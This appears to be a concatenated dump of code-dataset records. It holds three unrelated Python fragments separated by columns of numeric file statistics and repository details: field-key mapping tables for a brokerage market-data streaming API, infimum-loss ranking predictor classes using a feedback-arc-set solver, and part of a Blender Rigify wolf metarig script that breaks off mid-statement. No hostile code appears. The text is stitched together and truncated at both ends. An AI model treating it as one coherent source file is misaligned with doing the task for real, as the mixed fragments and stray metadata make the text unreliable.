        "1": "open-price",
        "2": "high-price",
        "3": "low-price",
        "4": "close_price",
        "5": "volume",
        "6": "sequence",
        "7": "chart_time",
        "8": "chart_day"
    },
    # All level-two (order book) services share the same three fields.
    "level_two_quotes": {
        "0": "key",
        "1": "time",
        "2": "data"
    },
    "level_two_nyse": {
        "0": "key",
        "1": "time",
        "2": "data"
    },
    "level_two_options": {
        "0": "key",
        "1": "time",
        "2": "data"
    },
    "level_two_forex": {
        "0": "key",
        "1": "time",
        "2": "data"
    },
    "level_two_nasdaq": {
        "0": "key",
        "1": "time",
        "2": "data"
    },
    "level_two_futures": {
        "0": "key",
        "1": "time",
        "2": "data"
    }
}
# Per-service field-key -> field-name tables (service names in upper case).
# Numeric keys appear in string-sorted order ("1", "10", "11", ..., "2", ...)
# rather than numeric order — presumably generated that way; order does not
# affect lookups. Typos and duplicate names are flagged inline and kept
# verbatim because consumers match on the exact strings.
CSV_FIELD_KEYS = {
    "ACTIVES_NASDAQ": {
        "key": "key",
        "1": "data"
    },
    "ACTIVES_OTCBB": {
        "key": "key",
        "1": "data"
    },
    "ACTIVES_NYSE": {
        "key": "key",
        "1": "data"
    },
    "ACTIVES_OPTIONS": {
        "key": "key",
        "1": "data"
    },
    "CHART_EQUITY": {
        "seq": "chart-sequence",
        "key": "symbol",
        # NOTE(review): "1" and "7" both map to "chart-time" — if fields are
        # renamed into a flat record, one overwrites the other. Verify which
        # id the service actually sends before changing either.
        "1": "chart-time",
        "2": "open-price",
        "3": "high-price",
        "4": "low-price",
        "5": "close-price",
        "6": "volume",
        "7": "chart-time",
        "8": "chart-day"
    },
    "CHART_FUTURES": {
        "seq": "chart-sequence",
        "key": "symbol",
        "1": "chart-time",
        "2": "open-price",
        "3": "high-price",
        "4": "low-price",
        "5": "close-price",
        "6": "volume"
    },
    "CHART_OPTIONS": {
        "seq": "chart-sequence",
        "key": "symbol",
        "1": "chart-time",
        "2": "open-price",
        "3": "high-price",
        "4": "low-price",
        "5": "close-price",
        "6": "volume"
    },
    "CHART_HISTORY": {
        "seq": "chart-sequence",
        "key": "symbol",
        # NOTE(review): duplicate "chart-time" target ("1" and "7"), same as
        # CHART_EQUITY above.
        "1": "chart-time",
        "2": "open-price",
        "3": "high-price",
        "4": "low-price",
        "5": "close-price",
        "6": "volume",
        "7": "chart-time",
        "8": "chart-day"
    },
    "CHART_HISTORY_FUTURES": {
        "seq": "chart-sequence",
        # NOTE(review): has both "key" -> "symbol" and "0" -> "key", unlike
        # the other chart tables — confirm against the service payload.
        "key": "symbol",
        "0": "key",
        "1": "chart-time",
        "2": "open-price",
        "3": "high-price",
        "4": "low-price",
        "5": "close-price",
        "6": "volume",
        "7": "chart-time",
        "8": "chart-day"
    },
    "LEVELONE_FOREX": {
        "1": "bid-price",
        "10": "high-price",
        "11": "low-price",
        "12": "close-price",
        "13": "exchange-id",
        "14": "description",
        "15": "open-price",
        "16": "net-change",
        "17": "percent-change",
        "18": "exchange-name",
        "19": "digits",
        "2": "ask-price",
        "20": "security-status",
        "21": "tick",
        "22": "tick-amount",
        "23": "product",
        "24": "trading-hours",
        "25": "is-tradable",
        "26": "market-maker",
        "27": "52-week-high",
        "28": "52-week-low",
        "29": "mark",
        "3": "last-price",
        "4": "bid-size",
        "5": "ask-size",
        "6": "total-volume",
        "7": "last-size",
        "8": "quote-time",
        "9": "trade-time",
        "assetMainType": "asset-main-type",
        "assetSubType": "asset-sub-type",
        "cusip": "cusip",
        "delayed": "delayed",
        "key": "symbol",
    },
    "LEVELONE_FUTURES": {
        "1": "bid-price",
        "10": "quote-time",
        "11": "trade-time",
        "12": "high-price",
        "13": "low-price",
        "14": "close-price",
        "15": "exchange-id",
        "16": "description",
        "17": "last-id",
        "18": "open-price",
        "19": "net-change",
        "2": "ask-price",
        "20": "future-percent-change",
        # NOTE(review): "exhange-name" (sic) — typo kept as-is deliberately.
        "21": "exhange-name",
        "22": "security-status",
        "23": "open-interest",
        "24": "mark",
        "25": "tick",
        "26": "tick-amount",
        "27": "product",
        "28": "future-price-format",
        "29": "future-trading-hours",
        "3": "last-price",
        "30": "future-is-tradable",
        "31": "future-multiplier",
        "32": "future-is-active",
        "33": "future-settlement-price",
        "34": "future-active-symbol",
        "35": "future-expiration-date",
        "4": "bid-size",
        "5": "ask-size",
        "6": "ask-id",
        "7": "bid-id",
        "8": "total-volume",
        "9": "last-size",
        "assetMainType": "asset-main-type",
        "assetSubType": "asset-sub-type",
        "cusip": "cusip",
        "delayed": "delayed",
        "key": "symbol",
    },
    # Identical field layout to "LEVELONE_FUTURES" above.
    "LEVELONE_FUTURES_OPTIONS": {
        "1": "bid-price",
        "10": "quote-time",
        "11": "trade-time",
        "12": "high-price",
        "13": "low-price",
        "14": "close-price",
        "15": "exchange-id",
        "16": "description",
        "17": "last-id",
        "18": "open-price",
        "19": "net-change",
        "2": "ask-price",
        "20": "future-percent-change",
        # NOTE(review): "exhange-name" (sic) — typo kept as-is deliberately.
        "21": "exhange-name",
        "22": "security-status",
        "23": "open-interest",
        "24": "mark",
        "25": "tick",
        "26": "tick-amount",
        "27": "product",
        "28": "future-price-format",
        "29": "future-trading-hours",
        "3": "last-price",
        "30": "future-is-tradable",
        "31": "future-multiplier",
        "32": "future-is-active",
        "33": "future-settlement-price",
        "34": "future-active-symbol",
        "35": "future-expiration-date",
        "4": "bid-size",
        "5": "ask-size",
        "6": "ask-id",
        "7": "bid-id",
        "8": "total-volume",
        "9": "last-size",
        "assetMainType": "asset-main-type",
        "assetSubType": "asset-sub-type",
        "cusip": "cusip",
        "delayed": "delayed",
        "key": "symbol",
    },
    "OPTION": {
        "1": "description",
        "10": "volatility",
        "11": "quote-time",
        "12": "trade-time",
        "13": "money-intrinsic-value",
        "14": "quote-day",
        "15": "trade-day",
        "16": "expiration-year",
        "17": "multiplier",
        "18": "digits",
        "19": "open-price",
        "2": "bid-price",
        "20": "bid-size",
        "21": "ask-size",
        "22": "last-size",
        "23": "net-change",
        "24": "strike-price",
        "25": "contract-type",
        "26": "underlying",
        "27": "expiration-month",
        "28": "deliverables",
        "29": "time-value",
        "3": "ask-price",
        "30": "expiration-day",
        "31": "days-to-expiration",
        "32": "delta",
        "33": "gamma",
        "34": "theta",
        "35": "vega",
        "36": "rho",
        "37": "security-status",
        "38": "theoretical-option-value",
        "39": "underlying-price",
        "4": "last-price",
        "40": "uv-expiration-type",
        "41": "mark",
        "5": "high-price",
        "6": "low-price",
        "7": "close-price",
        "8": "total-volume",
        "9": "open-interest",
        "assetMainType": "asset-main-type",
        "assetSubType": "asset-sub-type",
        "cusip": "cusip",
        "delayed": "delayed",
        "key": "symbol",
    },
    "QUOTE": {
        "10": "trade-time",
        "11": "quote-time",
        "12": "high-price",
        "13": "low-price",
        "14": "bid-tick",
        "15": "close-price",
        "16": "exchange-id",
        "17": "marginable",
        "18": "shortable",
        "1": "bid-price",
        "19": "island-bid",
        "20": "island-ask",
        "21": "island-volume",
        "22": "quote-day",
        "23": "trade-day",
        "24": "volatility",
        "25": "description",
        "26": "last-id",
        "27": "digits",
        "28": "open-price",
        "2": "ask-price",
        "29": "net-change",
        "30": "52-week-high",
        "31": "52-week-low",
        "32": "pe-ratio",
        "33": "dividend-amount",
        "34": "dividend-yield",
        "35": "island-bid-size",
        "36": "island-ask-size",
        "37": "nav",
        "38": "fund-price",
        "3": "last-price",
        "39": "exchange-name",
        "40": "dividend-date",
        "41": "regular-market-quote",
        "42": "regular-market-trade",
        "43": "regular-market-last-price",
        "44": "regular-market-last-size",
        "45": "regular-market-trade-time",
        "46": "regular-market-trade-day",
        "47": "regular-market-net-change",
        "48": "security-status",
        "4": "bid-size",
        "49": "mark",
        "50": "quote-time-in-long",
        "51": "trade-time-in-long",
        "5": "ask-size",
        "6": "ask-id",
        "7": "bid-id",
        "8": "total-volume",
        "9": "last-size",
        "assetMainType": "asset-main-type",
        "assetSubType": "asset-sub-type",
        "cusip": "cusip",
        "delayed": "delayed",
        "key": "symbol"
    },
    "NEWS_HEADLINE": {
        "1": "error-code",
        "10": "story-source",
        "2": "story-datetime",
        "3": "headline-id",
        "4": "status",
        "5": "headline",
        "6": "story-id",
        "7": "count-for-keyword",
        "8": "keyword-array",
        "9": "is-hot",
        "key": "symbol",
        "seq": "sequence"
    },
    # The four TIMESALE_* services share one layout.
    "TIMESALE_EQUITY": {
        "1": "trade-time",
        "2": "last-price",
        "3": "last-size",
        "4": "last-sequence",
        "key": "symbol",
        "seq": "sequence"
    },
    "TIMESALE_FUTURES": {
        "1": "trade-time",
        "2": "last-price",
        "3": "last-size",
        "4": "last-sequence",
        "key": "symbol",
        "seq": "sequence"
    },
    "TIMESALE_FOREX": {
        "1": "trade-time",
        "2": "last-price",
        "3": "last-size",
        "4": "last-sequence",
        "key": "symbol",
        "seq": "sequence"
    },
    "TIMESALE_OPTIONS": {
        "1": "trade-time",
        "2": "last-price",
        "3": "last-size",
        "4": "last-sequence",
        "key": "symbol",
        "seq": "sequence"
    },
}
# Level-two (order book) services whose payloads stay nested instead of being
# flattened through CSV_FIELD_KEYS; every one maps to the marker "nested".
CSV_FIELD_KEYS_LEVEL_2 = dict.fromkeys(
    ("NASDAQ_BOOK", "OPTIONS_BOOK", "LISTED_BOOK", "FUTURES_BOOK"),
    "nested",
)
| 26.565527
| 103
| 0.414928
| 1,887
| 18,649
| 4.059353
| 0.118177
| 0.023499
| 0.013055
| 0.009399
| 0.864621
| 0.853916
| 0.846084
| 0.839164
| 0.816841
| 0.816841
| 0
| 0.072497
| 0.347633
| 18,649
| 701
| 104
| 26.603424
| 0.557126
| 0
| 0
| 0.811782
| 0
| 0
| 0.435895
| 0.040163
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e15eda961a80cdf29e378c09b40005c5e137cf78
| 8,815
|
py
|
Python
|
problems/ranking/variational.py
|
VivienCabannes/infimum_loss
|
f3fa6dbdf73431105d1097712dae0d23ec0ca37d
|
[
"MIT"
] | 10
|
2020-12-22T21:30:06.000Z
|
2021-09-10T09:07:13.000Z
|
problems/ranking/variational.py
|
VivienCabannes/infimum_loss
|
f3fa6dbdf73431105d1097712dae0d23ec0ca37d
|
[
"MIT"
] | 5
|
2021-05-26T16:04:43.000Z
|
2021-08-05T13:52:17.000Z
|
problems/ranking/variational.py
|
VivienCabannes/infimum_loss
|
f3fa6dbdf73431105d1097712dae0d23ec0ca37d
|
[
"MIT"
] | null | null | null |
import numpy as np
from .fassolver import IlpSolver
class IL:
    """Infimum-loss predictor driven by alternate minimization.

    A kernel ``computer`` produces weights ``alpha`` for each test point and a
    feedback-arc-set (FAS) ``fas_solver`` performs the inner discrete
    minimizations. The loss is assumed to factor as
    ``ell(y, z) = -phi(y)^T phi(z)`` (see the sign flips below).
    """

    def __init__(self, computer, fas_solver=None):
        self.computer = computer
        self.solver = fas_solver
        # isinstance is the idiomatic type test and also accepts subclasses
        # of IlpSolver (the original used `type(...) == IlpSolver`).
        self.is_ilp = isinstance(fas_solver, IlpSolver)

    def train(self, x_train, S_train, **kwargs):
        """Fit the kernel computer and store the supervision embeddings."""
        self.computer.set_support(x_train)
        self.computer.train(**kwargs)
        # `np.float` was deprecated in NumPy 1.20 and removed in 1.24; the
        # builtin `float` is the documented replacement (float64 dtype).
        self.phi_init = S_train.astype(float)
        self.const = self.phi_init

    def __call__(self, x, tol=1e-3, solver=None, verbose=False):
        """Predict one embedding per row of ``x``.

        ``solver`` overrides the instance solver for this call; ``tol`` is
        the stopping tolerance of the alternate minimization.
        """
        if solver is None:
            if self.solver is None:
                raise ValueError('FAS solver has not been specified.')
            solver = self.solver
        alpha = self.computer(x)
        # Because \ell(y, z) = - \phi(y)^\top \phi(z):
        alpha *= -1
        pred = np.empty((len(x), self.phi_init.shape[-1]), dtype=float)
        phi_pl = np.empty(self.phi_init.shape, dtype=float)
        for i in range(len(pred)):
            # Rescale the objective to keep CPLEX numerically stable.
            alpha[i] /= np.abs(alpha[i]).max()
            alpha[i] *= 1e3
            self.solve(alpha[i], pred[i], phi_pl, tol, solver)
            if verbose and not (100 * i) % len(x):
                print(i, end=', ')
        return pred

    def solve(self, alpha, out, phi_pl, tol, solver):
        """Alternate minimization for one test point (writes ``out`` in place).

        ``phi_pl`` is scratch space for the pseudo-labels, re-initialized from
        the training supervision on every call.
        """
        # BUGFIX: the original mixed `self.solver`/`self.is_ilp` with the
        # `solver` argument, so a per-call solver override was silently
        # ignored for the z-minimization. Use the passed solver throughout.
        is_ilp = isinstance(solver, IlpSolver)
        phi_pl[:] = self.phi_init[:]
        if is_ilp:
            solver.set_objective(alpha @ phi_pl)
            out[:] = solver.solve()
        else:
            solver.solve_out(alpha @ phi_pl, out)
        old_out = np.zeros(out.shape, dtype=float)
        # Alternate until the z-iterate stops moving.
        while np.abs(out - old_out).max() > tol:
            old_out[:] = out[:]
            # Minimization over the pseudo-labels (y_i)_i.
            if is_ilp:
                # Positive-weight labels are solved against +out ...
                solver.set_objective(out)
                for j in range(len(phi_pl)):
                    if alpha[j] > 0:
                        solver.set_constraints(self.const[j])
                        phi_pl[j] = solver.solve()
                    else:
                        phi_pl[j] = 0
                # ... negative-weight labels against -out; zero-weight labels
                # keep the 0 written in the first pass.
                out *= -1
                solver.set_objective(out)
                for j in range(len(phi_pl)):
                    if alpha[j] < 0:
                        solver.set_constraints(self.const[j])
                        phi_pl[j] = solver.solve()
            else:
                pre_sol_pos = solver.pre_solve(out)
                out *= -1
                pre_sol_neg = solver.pre_solve(out)
                for j in range(len(phi_pl)):
                    if alpha[j] > 0:
                        solver.incorporate_const_out(pre_sol_pos, self.const[j], phi_pl[j])
                    elif alpha[j] < 0:
                        solver.incorporate_const_out(pre_sol_neg, self.const[j], phi_pl[j])
                    else:
                        phi_pl[j] = 0
            # Minimization over z.
            if is_ilp:
                solver.reset_constraints()
                solver.set_objective(alpha @ phi_pl)
                out[:] = solver.solve()
            else:
                solver.solve_out(alpha @ phi_pl, out)
class AC:
    """Average-candidate baseline: trains on set centers, decodes per point.

    ``get_center`` approximates the center of each supervision set by
    averaging ``num`` randomly-scored feasible solutions.
    """

    def __init__(self, computer, fas_solver):
        self.computer = computer
        self.solver = fas_solver
        # isinstance accepts IlpSolver subclasses; `type(...) ==` did not.
        self.is_ilp = isinstance(fas_solver, IlpSolver)

    def train(self, x_train, S_train, lambd, num=1, K_inv=None):
        """Fit the computer on set centers derived from ``S_train``."""
        self.computer.set_support(x_train)
        self.computer.train(lambd=lambd)
        phi = self.get_center(S_train, num, self.solver)
        self.computer.set_phi(phi)

    def __call__(self, x, verbose=False):
        """Decode one embedding per row of ``x``."""
        c = self.computer.call_with_phi(x)
        # ell(y, z) = -phi(y)^T phi(z): flip sign to minimize.
        c *= -1
        # `np.float` was removed in NumPy 1.24; builtin float is equivalent.
        pred = np.empty(c.shape, dtype=float)
        for i in range(len(x)):
            if self.is_ilp:
                self.solver.set_objective(c[i])
                pred[i] = self.solver.solve()
            else:
                self.solver.solve_out(c[i], pred[i])
            if verbose and not (100 * i) % len(x):
                print(i, end=", ")
        return pred

    @staticmethod
    def get_center(S_train, num, solver):
        """Approximate each supervision set's center.

        Draws ``num`` random linear objectives per set, solves each under the
        set constraints, drops duplicate solutions, and averages the rest.
        Non-deterministic (uses np.random).
        """
        is_ilp = isinstance(solver, IlpSolver)
        phi = np.empty(S_train.shape)
        tmp = np.empty((num, S_train.shape[1]))
        for i in range(len(phi)):
            tmp[:] = 0
            ctl = num  # number of distinct solutions actually kept
            for j in range(num):
                c = np.random.randn(S_train.shape[1])
                if is_ilp:
                    solver.set_constraints(S_train[i])
                    solver.set_objective(c)
                    tmp[j] = solver.solve()
                else:
                    tmp[j] += solver.solve_const(c, S_train[i])
                if j:
                    # Zero out exact duplicates of an earlier draw so they
                    # don't bias the average.
                    if (tmp[:j] == tmp[j]).mean(axis=1).max() == 1:
                        tmp[j] = 0
                        ctl -= 1
            phi[i] = tmp.sum(axis=0) / ctl
        if is_ilp:
            solver.reset_constraints()
        return phi
class SP:
    """Supervised-partial variant of IL.

    Mirrors IL's alternate minimization with the sign conditions on ``alpha``
    swapped, a tighter default tolerance, and a hard cap of 100 iterations.
    """

    def __init__(self, computer, fas_solver):
        self.computer = computer
        self.solver = fas_solver
        # isinstance is the idiomatic type test (was `type(...) ==`).
        self.is_ilp = isinstance(fas_solver, IlpSolver)

    def train(self, x_train, S_train, **kwargs):
        """Fit the kernel computer and store the supervision embeddings."""
        self.computer.set_support(x_train)
        self.computer.train(**kwargs)
        # `np.float` was removed in NumPy 1.24; builtin float is equivalent.
        self.phi_init = S_train.astype(float)
        self.const = self.phi_init

    def __call__(self, x, tol=1e-10, solver=None, verbose=False):
        """Predict one embedding per row of ``x``."""
        if solver is None:
            if self.solver is None:
                raise ValueError('FAS solver has not been specified.')
            solver = self.solver
        alpha = self.computer(x)
        # ell(y, z) = -phi(y)^T phi(z): flip sign to minimize.
        alpha *= -1
        pred = np.empty((len(x), self.phi_init.shape[-1]), dtype=float)
        phi_pl = np.empty(self.phi_init.shape, dtype=float)
        for i in range(len(pred)):
            self.solve(alpha[i], pred[i], phi_pl, tol, solver)
            if verbose and not (100 * i) % len(x):
                print(i, end=", ")
        return pred

    def solve(self, alpha, out, phi_pl, tol, solver):
        """Alternate minimization for one test point (writes ``out`` in place).

        Stops when the z-iterate moves by less than ``tol`` or after 100
        iterations, whichever comes first.
        """
        # BUGFIX: as in IL, the original used `self.solver`/`self.is_ilp` for
        # the z-minimization even when a different `solver` was passed in.
        is_ilp = isinstance(solver, IlpSolver)
        phi_pl[:] = self.phi_init[:]
        if is_ilp:
            solver.set_objective(alpha @ phi_pl)
            out[:] = solver.solve()
        else:
            solver.solve_out(alpha @ phi_pl, out)
        old_out = np.zeros(out.shape, dtype=float)
        # Alternate minimization, capped at 100 rounds.
        ctl = 0
        while np.abs(out - old_out).max() > tol and ctl < 100:
            ctl += 1
            old_out[:] = out[:]
            # Minimization over the pseudo-labels (y_i)_i.
            # NOTE: sign conditions are the mirror image of IL.solve.
            if is_ilp:
                solver.set_objective(out)
                for j in range(len(phi_pl)):
                    if alpha[j] < 0:
                        solver.set_constraints(self.const[j])
                        phi_pl[j] = solver.solve()
                    else:
                        phi_pl[j] = 0
                out *= -1
                solver.set_objective(out)
                for j in range(len(phi_pl)):
                    if alpha[j] > 0:
                        solver.set_constraints(self.const[j])
                        phi_pl[j] = solver.solve()
            else:
                pre_sol_pos = solver.pre_solve(out)
                out *= -1
                pre_sol_neg = solver.pre_solve(out)
                for j in range(len(phi_pl)):
                    if alpha[j] < 0:
                        solver.incorporate_const_out(pre_sol_pos, self.const[j], phi_pl[j])
                    elif alpha[j] > 0:
                        solver.incorporate_const_out(pre_sol_neg, self.const[j], phi_pl[j])
                    else:
                        phi_pl[j] = 0
            # Minimization over z.
            if is_ilp:
                solver.reset_constraints()
                solver.set_objective(alpha @ phi_pl)
                out[:] = solver.solve()
            else:
                solver.solve_out(alpha @ phi_pl, out)
| 36.42562
| 91
| 0.490414
| 1,083
| 8,815
| 3.815328
| 0.102493
| 0.043562
| 0.029042
| 0.028316
| 0.857696
| 0.845111
| 0.827686
| 0.827686
| 0.798645
| 0.780252
| 0
| 0.009517
| 0.392059
| 8,815
| 241
| 92
| 36.576763
| 0.761523
| 0.114124
| 0
| 0.735135
| 0
| 0
| 0.009507
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064865
| false
| 0
| 0.010811
| 0
| 0.113514
| 0.016216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1a8ea5495e6f54141a21ddd0c921bf5677e7575
| 172,316
|
py
|
Python
|
blender/2.79/scripts/addons/rigify/metarigs/Animals/wolf.py
|
uzairakbar/bpy2.79
|
3a3e0004ac6783c4e4b89d939e4432de99026a85
|
[
"MIT"
] | 2
|
2019-11-27T09:05:42.000Z
|
2020-02-20T01:25:23.000Z
|
rigify/metarigs/Animals/wolf.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | null | null | null |
rigify/metarigs/Animals/wolf.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | 4
|
2020-02-19T20:02:26.000Z
|
2022-02-11T18:47:56.000Z
|
import bpy
from mathutils import Color
def create(obj):
# generated by rigify.utils.write_metarig
bpy.ops.object.mode_set(mode='EDIT')
arm = obj.data
for i in range(6):
arm.rigify_colors.add()
arm.rigify_colors[0].name = "Root"
arm.rigify_colors[0].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[0].normal = Color((0.4352940022945404, 0.18431399762630463, 0.4156860113143921))
arm.rigify_colors[0].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[0].standard_colors_lock = True
arm.rigify_colors[1].name = "IK"
arm.rigify_colors[1].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[1].normal = Color((0.6039220094680786, 0.0, 0.0))
arm.rigify_colors[1].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[1].standard_colors_lock = True
arm.rigify_colors[2].name = "Special"
arm.rigify_colors[2].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[2].normal = Color((0.9568629860877991, 0.7882350087165833, 0.04705899953842163))
arm.rigify_colors[2].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[2].standard_colors_lock = True
arm.rigify_colors[3].name = "Tweak"
arm.rigify_colors[3].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[3].normal = Color((0.03921600058674812, 0.21176500618457794, 0.5803920030593872))
arm.rigify_colors[3].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[3].standard_colors_lock = True
arm.rigify_colors[4].name = "FK"
arm.rigify_colors[4].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[4].normal = Color((0.11764699965715408, 0.5686269998550415, 0.035294000059366226))
arm.rigify_colors[4].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[4].standard_colors_lock = True
arm.rigify_colors[5].name = "Extra"
arm.rigify_colors[5].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[5].normal = Color((0.9686279892921448, 0.2509799897670746, 0.09411799907684326))
arm.rigify_colors[5].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[5].standard_colors_lock = True
for i in range(29):
arm.rigify_layers.add()
arm.rigify_layers[0].name = "Face"
arm.rigify_layers[0].row = 1
arm.rigify_layers[0].set = False
arm.rigify_layers[0].group = 5
arm.rigify_layers[1].name = "Face (Primary)"
arm.rigify_layers[1].row = 2
arm.rigify_layers[1].set = False
arm.rigify_layers[1].group = 2
arm.rigify_layers[2].name = "Face (Secondary)"
arm.rigify_layers[2].row = 2
arm.rigify_layers[2].set = False
arm.rigify_layers[2].group = 3
arm.rigify_layers[3].name = "Spine"
arm.rigify_layers[3].row = 3
arm.rigify_layers[3].set = False
arm.rigify_layers[3].group = 3
arm.rigify_layers[4].name = "Spine (Tweak)"
arm.rigify_layers[4].row = 4
arm.rigify_layers[4].set = False
arm.rigify_layers[4].group = 4
arm.rigify_layers[5].name = "Paws"
arm.rigify_layers[5].row = 5
arm.rigify_layers[5].set = False
arm.rigify_layers[5].group = 6
arm.rigify_layers[6].name = "Paws (Tweak)"
arm.rigify_layers[6].row = 6
arm.rigify_layers[6].set = False
arm.rigify_layers[6].group = 4
arm.rigify_layers[7].name = "Arm.L (IK)"
arm.rigify_layers[7].row = 7
arm.rigify_layers[7].set = False
arm.rigify_layers[7].group = 2
arm.rigify_layers[8].name = "Arm.L (FK)"
arm.rigify_layers[8].row = 8
arm.rigify_layers[8].set = False
arm.rigify_layers[8].group = 5
arm.rigify_layers[9].name = "Arm.L (Tweak)"
arm.rigify_layers[9].row = 9
arm.rigify_layers[9].set = False
arm.rigify_layers[9].group = 4
arm.rigify_layers[10].name = "Arm.R (IK)"
arm.rigify_layers[10].row = 7
arm.rigify_layers[10].set = False
arm.rigify_layers[10].group = 2
arm.rigify_layers[11].name = "Arm.R (FK)"
arm.rigify_layers[11].row = 8
arm.rigify_layers[11].set = False
arm.rigify_layers[11].group = 5
arm.rigify_layers[12].name = "Arm.R (Tweak)"
arm.rigify_layers[12].row = 9
arm.rigify_layers[12].set = False
arm.rigify_layers[12].group = 4
arm.rigify_layers[13].name = "Leg.L (IK)"
arm.rigify_layers[13].row = 10
arm.rigify_layers[13].set = False
arm.rigify_layers[13].group = 2
arm.rigify_layers[14].name = "Leg.L (FK)"
arm.rigify_layers[14].row = 11
arm.rigify_layers[14].set = False
arm.rigify_layers[14].group = 5
arm.rigify_layers[15].name = "Leg.L (Tweak)"
arm.rigify_layers[15].row = 12
arm.rigify_layers[15].set = False
arm.rigify_layers[15].group = 4
arm.rigify_layers[16].name = "Leg.R (IK)"
arm.rigify_layers[16].row = 10
arm.rigify_layers[16].set = False
arm.rigify_layers[16].group = 2
arm.rigify_layers[17].name = "Leg.R (FK)"
arm.rigify_layers[17].row = 11
arm.rigify_layers[17].set = False
arm.rigify_layers[17].group = 5
arm.rigify_layers[18].name = "Leg.R (Tweak)"
arm.rigify_layers[18].row = 12
arm.rigify_layers[18].set = False
arm.rigify_layers[18].group = 4
arm.rigify_layers[19].name = "Tail"
arm.rigify_layers[19].row = 13
arm.rigify_layers[19].set = False
arm.rigify_layers[19].group = 6
arm.rigify_layers[20].name = ""
arm.rigify_layers[20].row = 1
arm.rigify_layers[20].set = False
arm.rigify_layers[20].group = 0
arm.rigify_layers[21].name = ""
arm.rigify_layers[21].row = 13
arm.rigify_layers[21].set = False
arm.rigify_layers[21].group = 0
arm.rigify_layers[22].name = ""
arm.rigify_layers[22].row = 13
arm.rigify_layers[22].set = False
arm.rigify_layers[22].group = 0
arm.rigify_layers[23].name = ""
arm.rigify_layers[23].row = 1
arm.rigify_layers[23].set = False
arm.rigify_layers[23].group = 0
arm.rigify_layers[24].name = ""
arm.rigify_layers[24].row = 1
arm.rigify_layers[24].set = False
arm.rigify_layers[24].group = 0
arm.rigify_layers[25].name = ""
arm.rigify_layers[25].row = 1
arm.rigify_layers[25].set = False
arm.rigify_layers[25].group = 0
arm.rigify_layers[26].name = ""
arm.rigify_layers[26].row = 1
arm.rigify_layers[26].set = False
arm.rigify_layers[26].group = 0
arm.rigify_layers[27].name = ""
arm.rigify_layers[27].row = 1
arm.rigify_layers[27].set = False
arm.rigify_layers[27].group = 0
arm.rigify_layers[28].name = "Root"
arm.rigify_layers[28].row = 14
arm.rigify_layers[28].set = False
arm.rigify_layers[28].group = 1
bones = {}
bone = arm.edit_bones.new('spine')
bone.head[:] = 0.0000, 1.1044, 0.7633
bone.tail[:] = 0.0000, 0.9624, 0.7412
bone.roll = 0.0000
bone.use_connect = False
bones['spine'] = bone.name
bone = arm.edit_bones.new('spine.001')
bone.head[:] = 0.0000, 0.9624, 0.7412
bone.tail[:] = 0.0000, 0.7755, 0.7418
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine']]
bones['spine.001'] = bone.name
bone = arm.edit_bones.new('spine.002')
bone.head[:] = 0.0000, 0.7755, 0.7418
bone.tail[:] = 0.0000, 0.5547, 0.7568
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.001']]
bones['spine.002'] = bone.name
bone = arm.edit_bones.new('spine.003')
bone.head[:] = 0.0000, 0.5547, 0.7568
bone.tail[:] = 0.0000, 0.4418, 0.7954
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.002']]
bones['spine.003'] = bone.name
bone = arm.edit_bones.new('spine.004')
bone.head[:] = 0.0000, 0.4418, 0.7954
bone.tail[:] = 0.0000, 0.3546, 0.8059
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.003']]
bones['spine.004'] = bone.name
bone = arm.edit_bones.new('spine.005')
bone.head[:] = 0.0000, 0.3546, 0.8059
bone.tail[:] = 0.0000, 0.1803, 0.7782
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.004']]
bones['spine.005'] = bone.name
bone = arm.edit_bones.new('spine.006')
bone.head[:] = 0.0000, 0.1803, 0.7782
bone.tail[:] = 0.0000, 0.0319, 0.7731
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.005']]
bones['spine.006'] = bone.name
bone = arm.edit_bones.new('pelvis.L')
bone.head[:] = 0.0000, 0.3757, 0.6043
bone.tail[:] = 0.0751, 0.2755, 0.8544
bone.roll = -1.5841
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['pelvis.L'] = bone.name
bone = arm.edit_bones.new('pelvis.R')
bone.head[:] = -0.0000, 0.3757, 0.6043
bone.tail[:] = -0.0751, 0.2755, 0.8544
bone.roll = 1.5841
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
